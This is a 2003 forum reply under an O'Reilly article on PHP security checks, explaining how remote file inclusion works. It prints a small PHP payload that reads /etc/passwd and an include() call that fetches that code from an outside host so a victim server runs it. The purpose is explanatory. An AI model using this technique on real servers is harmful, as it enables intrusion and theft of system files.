ONJava.com -- The Independent Source for Enterprise Java
oreilly.comSafari Books Online.Conferences.

advertisement

AddThis Social Bookmark Button
Article:
  Ten Security Checks for PHP, Part 1
Subject:   Not the kind of article i would expect from o'reilly!
Date:   2003-05-23 00:10:42
From:   clancymalcolm
Response to: Not the kind of article i would expect from o'reilly!

To further clarify how include(...) can harm your own server...


I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>


Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.


Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");


Then YOUR web server will show me it's /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.


Clancy.